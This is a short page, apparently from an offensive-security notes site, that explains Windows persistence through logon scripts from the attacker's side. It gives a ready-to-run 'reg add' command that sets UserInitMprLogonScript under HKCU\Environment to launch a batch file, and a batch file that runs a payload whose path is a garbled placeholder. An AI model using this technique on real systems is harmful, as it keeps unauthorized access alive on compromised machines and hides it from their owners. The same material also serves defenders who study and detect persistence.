Logon Scripts

Logon scripts will run every time the user logs on. These are intended to ease admins by automatically executing commands during session initiation, but as attackers, we can abuse this to establish persistence.

To perform this persistence technique, issue the following command

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "c:\script.bat" /t REG_SZ /f

Our bat file can simply contain the directory of our payload to execute.

@ECHO OFF

C:\<ILE>

PreviousRegistry Keys NextPowershell Profiles

Last updated 2 years ago